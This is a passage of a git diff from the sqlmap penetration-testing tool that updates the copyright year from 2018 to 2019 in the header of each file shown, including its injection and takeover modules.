16125dd1717..fe5706a5512 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/exception.py b/lib/core/exception.py index 2113de86518..ad87adf6f8a 100644 --- a/lib/core/exception.py +++ b/lib/core/exception.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/log.py b/lib/core/log.py index 6df49f584ef..096fdfd9053 100644 --- a/lib/core/log.py +++ b/lib/core/log.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/option.py b/lib/core/option.py index 85fcd3806fe..27b63e81f30 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 6528e5cf30e..b72cdffe4d4 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/patch.py b/lib/core/patch.py index f55ab7b4a7e..49a458431b5 100644 --- a/lib/core/patch.py +++ b/lib/core/patch.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/profiling.py b/lib/core/profiling.py index def2b2af3c0..44d91bc8ba8 100644 --- a/lib/core/profiling.py +++ b/lib/core/profiling.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py index 2ff8b70c8d2..cccd2af34a4 100644 --- a/lib/core/readlineng.py +++ b/lib/core/readlineng.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/replication.py b/lib/core/replication.py index 764f7664e6a..f9444af7586 100644 --- a/lib/core/replication.py +++ b/lib/core/replication.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/revision.py b/lib/core/revision.py index eaeac85b9a3..600584de2f2 100644 --- a/lib/core/revision.py +++ b/lib/core/revision.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/session.py b/lib/core/session.py index 3d0ba367a9a..9cf569b687b 100644 --- a/lib/core/session.py +++ b/lib/core/session.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/settings.py b/lib/core/settings.py index ce19e72a6bd..5f6f1e9e702 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/shell.py b/lib/core/shell.py index d9fb4f59091..6cf7640b335 100644 --- a/lib/core/shell.py +++ b/lib/core/shell.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/subprocessng.py b/lib/core/subprocessng.py index b51a64bba2f..b6fc19cfde4 100644 --- a/lib/core/subprocessng.py +++ b/lib/core/subprocessng.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/target.py b/lib/core/target.py index 3d99d10e169..af20a002725 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/testing.py b/lib/core/testing.py index ec53aa1de93..2b121bf68ac 100644 --- a/lib/core/testing.py +++ b/lib/core/testing.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/threads.py b/lib/core/threads.py index 5d8ea0edc81..9c0de76e2e3 100644 --- a/lib/core/threads.py +++ b/lib/core/threads.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/unescaper.py b/lib/core/unescaper.py index 71950f24105..e95378b1575 100644 --- a/lib/core/unescaper.py +++ b/lib/core/unescaper.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/update.py b/lib/core/update.py index e027024e399..814424a37db 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/wordlist.py b/lib/core/wordlist.py index 77c779a270c..70d93f3338e 100644 --- a/lib/core/wordlist.py +++ b/lib/core/wordlist.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/__init__.py b/lib/parse/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/parse/__init__.py +++ b/lib/parse/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/banner.py b/lib/parse/banner.py index 20d62bab0b0..77ae798f67e 100644 --- a/lib/parse/banner.py +++ b/lib/parse/banner.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 9b8ec070478..db86972065e 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py index d8ae541d65f..c76b7399483 100644 --- a/lib/parse/configfile.py +++ b/lib/parse/configfile.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/handler.py b/lib/parse/handler.py index 191466a8dbd..b69df9e8175 100644 --- a/lib/parse/handler.py +++ b/lib/parse/handler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/headers.py b/lib/parse/headers.py index 1f42b171761..b348f25b230 100644 --- a/lib/parse/headers.py +++ b/lib/parse/headers.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/html.py b/lib/parse/html.py index a7eb7d7ca63..3ec61d52fed 100644 --- a/lib/parse/html.py +++ b/lib/parse/html.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py index 6ea796060a0..1eb13d4984d 100644 --- a/lib/parse/payloads.py +++ b/lib/parse/payloads.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/sitemap.py b/lib/parse/sitemap.py index 3c503f9fb12..a9b95890ef4 100644 --- a/lib/parse/sitemap.py +++ b/lib/parse/sitemap.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/__init__.py b/lib/request/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/request/__init__.py +++ b/lib/request/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/basic.py b/lib/request/basic.py index f60ead067cd..5452ea99c0e 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/basicauthhandler.py b/lib/request/basicauthhandler.py index 81f4943130a..e686226526f 100644 --- a/lib/request/basicauthhandler.py +++ b/lib/request/basicauthhandler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/comparison.py b/lib/request/comparison.py index 146150ac92c..ef0a6f11dcf 100644 --- a/lib/request/comparison.py +++ b/lib/request/comparison.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/connect.py b/lib/request/connect.py index eac8a2c8581..bc4f6714599 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/direct.py b/lib/request/direct.py index 9b679fc52a3..c4a8a5b22b9 100644 --- a/lib/request/direct.py +++ b/lib/request/direct.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/dns.py b/lib/request/dns.py index 2cf11fe83a0..9eeb7630e07 100644 --- a/lib/request/dns.py +++ b/lib/request/dns.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py index a98bdc71b0d..33a9dfc8b66 100644 --- a/lib/request/httpshandler.py +++ b/lib/request/httpshandler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/inject.py b/lib/request/inject.py index 34271e1dfe2..38fe6da5b8c 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/methodrequest.py b/lib/request/methodrequest.py index 7187c4404d7..e07f4765fa9 100644 --- a/lib/request/methodrequest.py +++ b/lib/request/methodrequest.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/pkihandler.py b/lib/request/pkihandler.py index 71a5eb352ac..f34aedf2bea 100644 --- a/lib/request/pkihandler.py +++ b/lib/request/pkihandler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/rangehandler.py b/lib/request/rangehandler.py index 6c7e33ffa8d..0f62c4da619 100644 --- a/lib/request/rangehandler.py +++ b/lib/request/rangehandler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py index 6248ce3c1dc..81c0cb5d2ea 100644 --- a/lib/request/redirecthandler.py +++ b/lib/request/redirecthandler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/templates.py b/lib/request/templates.py index ff8ac82fe35..6f8f155e02b 100644 --- a/lib/request/templates.py +++ b/lib/request/templates.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/takeover/__init__.py b/lib/takeover/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/takeover/__init__.py +++ b/lib/takeover/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py index 490c8c2987e..81db1bcb5f9 100644 --- a/lib/takeover/abstraction.py +++ b/lib/takeover/abstraction.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py index f2c0f609cf4..4be69f4685d 100644 --- a/lib/takeover/icmpsh.py +++ b/lib/takeover/icmpsh.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index c7a4e18bd7d..d42747b54c4 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py index 00b5183a7b2..5b83526c006 100644 --- a/lib/takeover/registry.py +++ b/lib/takeover/registry.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py index 7e2d46dd2e0..e5f7c9e5049 100644 --- a/lib/takeover/udf.py +++ b/lib/takeover/udf.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 921366a00b1..445270f285e 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index e2f92441d3f..d4db1a6b59a 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/techniques/__init__.py b/lib/techniques/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/techniques/__init__.py +++ b/lib/techniques/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/techniques/blind/__init__.py b/lib/techniques/blind/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/techniques/blind/__init__.py +++ b/lib/techniques/blind/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 484666e0cfe..ce869360e7e 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/techniques/dns/__init__.py b/lib/techniques/dns/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/techniques/dns/__init__.py +++ b/lib/techniques/dns/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/techniques/dns/test.py b/lib/techniques/dns/test.py index 7a580e6e5c4..361a3b088f0 100644 --- a/lib/techniques/dns/test.py +++ b/lib/techniques/dns/test.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py index a90967e99d5..7a37736d99f 100644 --- a/lib/techniques/dns/use.py +++ b/lib/techniques/dns/use.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/techniques/error/__init__.py b/lib/techniques/error/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/techniques/error/__init__.py +++ b/lib/techniques/error/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index c252570b932..f6ded61f17d 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/techniques/union/__init__.py b/lib/techniques/union/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/techniques/union/__init__.py +++ b/lib/techniques/union/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 6197cce432e..e8bd84546c7 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index 49624d59c63..163f6276188 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/__init__.py b/lib/utils/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/utils/__init__.py +++ b/lib/utils/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/api.py b/lib/utils/api.py index ed97128aadd..2faa81a6de6 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -2,7 +2,7 @@ # -*- coding: utf-8 -*- """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/brute.py b/lib/utils/brute.py index 148a69d6a91..ff4e7c17b54 100644 --- a/lib/utils/brute.py +++ b/lib/utils/brute.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py index bcd9495fccb..7ceb98a7378 100644 --- a/lib/utils/crawler.py +++ b/lib/utils/crawler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/deps.py b/lib/utils/deps.py index 937a21c8cce..265c0eb87fd 100644 --- a/lib/utils/deps.py +++ b/lib/utils/deps.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/getch.py b/lib/utils/getch.py index d2c204ac4c5..733fdf57078 100644 --- a/lib/utils/getch.py +++ b/lib/utils/getch.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/har.py b/lib/utils/har.py index 4def9b3db45..252da45d179 100644 --- a/lib/utils/har.py +++ b/lib/utils/har.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 39e9b2ea13a..3985670f96b 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py index b3f77358b8b..d8206b55661 100644 --- a/lib/utils/hashdb.py +++ b/lib/utils/hashdb.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/htmlentities.py b/lib/utils/htmlentities.py index 399e3580c43..a97320ec098 100644 --- a/lib/utils/htmlentities.py +++ b/lib/utils/htmlentities.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py index 03e2226a8c5..8849cbfcda3 100644 --- a/lib/utils/pivotdumptable.py +++ b/lib/utils/pivotdumptable.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/progress.py b/lib/utils/progress.py index 1776fb25ade..785f0d4d49d 100644 --- a/lib/utils/progress.py +++ b/lib/utils/progress.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/purge.py b/lib/utils/purge.py index aab84005807..5604aba670d 100644 --- a/lib/utils/purge.py +++ b/lib/utils/purge.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/search.py b/lib/utils/search.py index e2cca24b948..8046c156206 100644 --- a/lib/utils/search.py +++ b/lib/utils/search.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py index 